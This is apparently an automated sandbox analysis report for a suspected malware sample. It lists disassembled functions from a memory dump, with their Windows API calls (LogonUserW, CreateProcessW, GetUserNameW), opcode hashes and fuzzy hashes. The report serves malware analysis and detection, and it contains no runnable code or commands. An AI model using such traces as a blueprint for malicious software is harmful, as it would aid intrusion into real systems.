                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 8356f56be6522a0a08f62a9fc6c86a0c4d7a2113ac88e52820c54734f4ca921b
                                        • Instruction ID: 8b74e9c60a7ffa7d00fe5f030bb949b9ec38dfdef5bcbfab7de43182914191dd
                                        • Opcode Fuzzy Hash: 8356f56be6522a0a08f62a9fc6c86a0c4d7a2113ac88e52820c54734f4ca921b
                                        • Instruction Fuzzy Hash: F3F06D31640259AFDB21DF58DC05FD63B95EB1A720F044018BA11672E2CB707820F7A1
                                        Function 00EE4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EE4F18
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: mouse_event
                                        • String ID:
                                        • API String ID: 2434400541-0
                                        • Opcode ID: 549884106a6c75e4300015d15c68557659b6e6c051c7e8c7ad702628c2459320
                                        • Instruction ID: 1a4ca541a22ad41cd57b935374416731587d691eedb7282e1d5c0122d29ad914
                                        • Opcode Fuzzy Hash: 549884106a6c75e4300015d15c68557659b6e6c051c7e8c7ad702628c2459320
                                        • Instruction Fuzzy Hash: C5D05EF036828D38FC284B22AC1FFB61108F380F85F8479893201B99C698E1A800E035
                                        Function 00ED8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ED88D1), ref: 00ED8CB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LogonUser
                                        • String ID:
                                        • API String ID: 1244722697-0
                                        • Opcode ID: 31f2aa72666d1d01ce24b581927bba8983892e8f0e22e082146da5452b67cdaa
                                        • Instruction ID: 37e3ecee24e81ee41e28a15fde041224142a1bf97a4e0e383364184ff2a124b7
                                        • Opcode Fuzzy Hash: 31f2aa72666d1d01ce24b581927bba8983892e8f0e22e082146da5452b67cdaa
                                        • Instruction Fuzzy Hash: DED05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                                        Function 00F0CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00EBBC0C,?,?,?,?,?,?), ref: 00F0CC24
                                          • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B8FE
                                          • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B90D
                                          • Part of subcall function 00F0B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                                          • Part of subcall function 00F0B8EF: CloseHandle.KERNEL32 ref: 00F0B94E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        • Opcode ID: 1ca63d34c9d7bcd0f6dfc916afea1a1a61e20ffbf76d91401d89012727601b4a
                                        • Instruction ID: 2189a3aac8013fb379830c79113c314819dafd906d1fd735953ab3abed0382b7
                                        • Opcode Fuzzy Hash: 1ca63d34c9d7bcd0f6dfc916afea1a1a61e20ffbf76d91401d89012727601b4a
                                        • Instruction Fuzzy Hash: 22E01236100208DFDB01AF04DD00E9537A6FB19310F008011FA05572B2CB31A960FF90
                                        Function 00E8167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00E81AEE,?,?,?), ref: 00E816AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: f35936fb4a2114c7c66673f75911c180a84147bc8ddf5a3068af89ae08803c7e
                                        • Instruction ID: 0eae2c4ae49221a58af733f4d3536ff6f160587821a1be0a8ff1963262d205a7
                                        • Opcode Fuzzy Hash: f35936fb4a2114c7c66673f75911c180a84147bc8ddf5a3068af89ae08803c7e
                                        • Instruction Fuzzy Hash: 51E0EC35100208BBCF15AF90DC11E643B66FB59714F108418FA495A2A2CE32A522FB51
                                        Function 00F0CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 00F0CBA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: d51f752ece4dc8345863a53258f40901de601170134b2e3f9a07c027ed7106f6
                                        • Instruction ID: a875423bf605cdb0e07130e50fe7f606f6cd2f0789ec4368e5f09a80c7057a65
                                        • Opcode Fuzzy Hash: d51f752ece4dc8345863a53258f40901de601170134b2e3f9a07c027ed7106f6
                                        • Instruction Fuzzy Hash: 47E0427924024DEFDB01DF88D945DD63BA5BB1E700F054054FE1557262CB71A864EBA2
                                        Function 00F0CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 00F0CB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 7fee1a3d01bc36e118ac539ad620a3574e71f7647306f1679745c214445ef035
                                        • Instruction ID: 41a4f116101ccd8263379565ef6fde5c8f9c86ef93c39ac67e1dc84e0d12c496
                                        • Opcode Fuzzy Hash: 7fee1a3d01bc36e118ac539ad620a3574e71f7647306f1679745c214445ef035
                                        • Instruction Fuzzy Hash: 96E0427924424DAFDB01DF88DC85E963BA5BB1E700F054054FE1557262CB71A820EB62
                                        Function 00E816B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E8201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                                          • Part of subcall function 00E8201B: KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00E81AE2,?,?), ref: 00E816D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        • Opcode ID: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                                        • Instruction ID: fd1d1bde70cd02b0948d7165296ee004352640cbee38d21789279e092deabaa1
                                        • Opcode Fuzzy Hash: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                                        • Instruction Fuzzy Hash: BFD0127014030877DA207B50DC17F593E5D9B18B50F408025BB0C791D3DA716810B659
                                        Function 00EC2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00EC2242
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                                        • Instruction ID: 1a02be1c6492fbf84946b86345d5c17a681eb3db61d674938289bbc0ebe52abf
                                        • Opcode Fuzzy Hash: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                                        • Instruction Fuzzy Hash: 4EC04CF1C0010DDBDB15DB90DA88DEE77BCBB04304F104095A101F2101D7749B449E71
                                        Function 00EAA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EAA36A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                                        • Instruction ID: 1b65b4396e43052bb5ec679ea188db4630657b7a8d374d12ba6ee0f16eb7529c
                                        • Opcode Fuzzy Hash: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                                        • Instruction Fuzzy Hash: 18A0113000820CABCA002B82EC08888BFACEA002A0B008020F80C808228B32A820AA80
                                        Function 00E98A0E Relevance: .6, Instructions: 608COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                                        • Instruction ID: 75cddf3d90130fbde8357d2cd4c7ecd4cd8155fdb4f6f0cf5be2eb99c1d12a52
                                        • Opcode Fuzzy Hash: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                                        • Instruction Fuzzy Hash: 08222A31505615CBDF388F24C6946BDB7A1EB03308F68646BD852BB3A1EB34DD82DB61
                                        Function 00EA2405 Relevance: .3, Instructions: 345COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: b6569bf24f4fb32519d62c68f195598c27664ac7b0d39e6ea65735f2cb9dd880
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 78C180362050A30ADB6D463D943403EBEE15EA77B531A279DE4B2FF5C4EF20E524E620
                                        Function 00EA283A Relevance: .3, Instructions: 341COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: 0a498e998ab5fbc64516cf93272ba7534e9069f07b333da2adbf6c8dbf396e69
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: 77C182362051A30ADB6D463D843403EBEE15EA77B531A27ADE4B2FF5D4EF20E5249620
                                        Function 00EA1BB8 Relevance: .3, Instructions: 323COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: 1c1214552a72de12ce12e84b70acbac49362d2217005addbc164062bb7396afe
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: 99C192363051A30DDB6D4639843403EBEE15EA77B671A27EDE4B2EF5C4EF20E5249610
                                        Function 00F037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,00F0F910), ref: 00F038AF
                                        • IsWindowVisible.USER32(?), ref: 00F038D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpperVisibleWindow
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 4105515805-45149045
                                        • Opcode ID: 8d7fd1bfa7a33fa8f29d270a87b063a641b36ca4c33cd3037bd1529a0ef4aa8a
                                        • Instruction ID: f3a289ba1d6da0b207771acb4217f9e722f03de8e974fd2d3a0923959db9ff68
                                        • Opcode Fuzzy Hash: 8d7fd1bfa7a33fa8f29d270a87b063a641b36ca4c33cd3037bd1529a0ef4aa8a
                                        • Instruction Fuzzy Hash: 3DD1A4716043058BCB14EF10C891A6A77E9EF98354F159459F88A6B3E3CB31EE0BEB41
                                        Function 00F0A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 00F0A89F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00F0A8D0
                                        • GetSysColor.USER32(0000000F), ref: 00F0A8DC
                                        • SetBkColor.GDI32(?,000000FF), ref: 00F0A8F6
                                        • SelectObject.GDI32(?,?), ref: 00F0A905
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0A930
                                        • GetSysColor.USER32(00000010), ref: 00F0A938
                                        • CreateSolidBrush.GDI32(00000000), ref: 00F0A93F
                                        • FrameRect.USER32(?,?,00000000), ref: 00F0A94E
                                        • DeleteObject.GDI32(00000000), ref: 00F0A955
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0A9A0
                                        • FillRect.USER32(?,?,?), ref: 00F0A9D2
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0A9FD
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(00000012), ref: 00F0AB99
                                          • Part of subcall function 00F0AB60: SetTextColor.GDI32(?,?), ref: 00F0AB9D
                                          • Part of subcall function 00F0AB60: GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(0000000F), ref: 00F0ABBE
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(00000011), ref: 00F0ABDB
                                          • Part of subcall function 00F0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                                          • Part of subcall function 00F0AB60: SelectObject.GDI32(?,00000000), ref: 00F0ABFA
